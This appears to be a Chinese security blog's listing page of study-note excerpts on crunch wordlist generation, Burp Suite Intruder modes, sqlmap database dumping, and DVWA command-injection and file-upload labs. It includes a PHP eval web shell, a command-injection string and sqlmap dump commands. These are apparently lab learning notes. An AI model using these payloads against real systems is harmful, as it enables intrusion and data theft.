2020-2-22 ITHO
学习笔记
基本用法 #crunch 最小长度 最大长度 由哪些数组成
例如 ---- 生成一个长度最小3位,最大3位的密码,且都由1234567890中的4个数字组成 (需要生成空格则后面加空格即可)
#crunch 3 3 123456789
保存字典 ---- 把生成的字典保存在Desktop上的pass.txt中
#crunch 3 3 123456789 >>/root/Desktop/pass.txt
生成个人信息词典 --- 包括 姓名 生日 年龄等信息(前面最小最大长度必须要输入,不会对结果产生影响)
#cr...
阅读全文>>
标签: kali linux crunch 字典
评论(0)
(2309)
2020-2-20 ITHO
学习笔记
1. Sniper(狙击手)
顾名思义,就是一个一个的来,就跟98K一样,一ju一个准。也是最基础的一种模式。
添加了一个参数的话,并且假设payload有500个的话,那就执行500次,如果添加了两个参数的话,就会挨着来,第一个参数开始爆破时,第二个不变,如此这样,会进行500+500此 总共1000次爆破。
2. Battering ram(攻城锤)
顾名思义,和狙击手差不多,一个参数的话都一样,只不过如果添加了两个参数的话,就一起进行爆破。那么两个参数爆破时候的值肯定就是一样的了。那么就只会进行500次爆破。
3. Pitchfork(草叉模式)
此模式下如果只添加了一个参数的话,会报错,添加了两个参数的话 ,要求添加两个...
阅读全文>>
评论(0)
(160)
2020-2-1 ITHO
学习笔记
sqlmap -u "url" --dbs
跑数据库
sqlmap -u "url" --tables
跑数据表
sqlmap -u "url" --columns -T "表名"
跑出表字段
sqlmap -u "url" --dump -T "表名" -C "需要跑的字段"
跑字段里面内容
-r 指定文件
-u 指定url
-D 指定数据库
-T 指定表
-C 指定字段
--batch 不会询问你输入 全部默认确定
阅读全文>>
标签: sqlmap
评论(0)
(280)
2020-1-1 ITHO
学习笔记
关于命令连接符介绍:
command1 && command2 先执行command1后执行command2
command1 | command2 只执行command2
command1 & command2 先执行command2后执行command1
以上三种连接符在windows和linux环境下都支持
————————————————
LOW级别:
没有对任何进行过滤直接 192.168.1.1&&dir 成功执行
Medium级别:
再次提交192.168.1.1&&dir提示:“Ping 请求找不到主机 192.168...
阅读全文>>
评论(0)
(187)
2020-1-1 ITHO
学习笔记
Low级别:
没有对上传文件类型进行任何限制,直接上传一个php,<? eval($REQUEST['a']); ?>
上传成功后,还告知了我们路径,直接拼接起来访问执行个phpinfo试试看。
Medium级别:
我们再上传个php试试看,上传失败提示:Your image was not uploaded. We can only accept JPEG or PNG images.对上传文件进行了限制,只能上传jpeg或者png类型的文件了。直接burp suite拦截,然后选php文件上传,把burp suite拦截下来的数据,Content-Type: application/x-php这一...
阅读全文>>
评论(0)
(1274)